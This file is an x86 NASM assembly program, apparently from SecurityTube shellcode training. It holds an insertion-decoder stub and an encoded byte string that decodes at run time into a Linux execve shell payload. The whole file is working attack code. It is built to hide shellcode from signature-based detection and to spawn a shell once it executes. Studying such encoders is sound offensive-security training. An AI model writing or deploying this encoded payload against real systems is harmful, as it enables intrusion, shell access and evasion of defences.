; Filename: insertion-decoder.nasm
; Author:  Vivek Ramachandran
; Website:  http://securitytube.net
; Training: http://securitytube-training.com 
;
;
; Purpose: 

global _start			
section .text

_start:
	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xaa
	jnz short EncodedShellcode
	mov bl,byte [esi+eax+1]
	add bl,1
	mov byte [edi],bl
	inc edi
	add al, 2
	jmp short decode	

call_shellcode:
	call decoder
	EncodedShellcode: db 0x30,0xaa,0xbf,0xaa,0x4f,0xaa,0x67,0xaa,0x2e,0xaa,0x2e,0xaa,0x72,0xaa,0x67,0xaa,0x67,0xaa,0x2e,0xaa,0x61,0xaa,0x68,0xaa,0x6d,0xaa,0x88,0xaa,0xe2,0xaa,0x4f,0xaa,0x88,0xaa,0xe1,0xaa,0x52,0xaa,0x88,0xaa,0xe0,0xaa,0xaf,0xaa,0x0a,0xaa,0xcc,0xaa,0x7f,0xaa,0xbb,0xbb
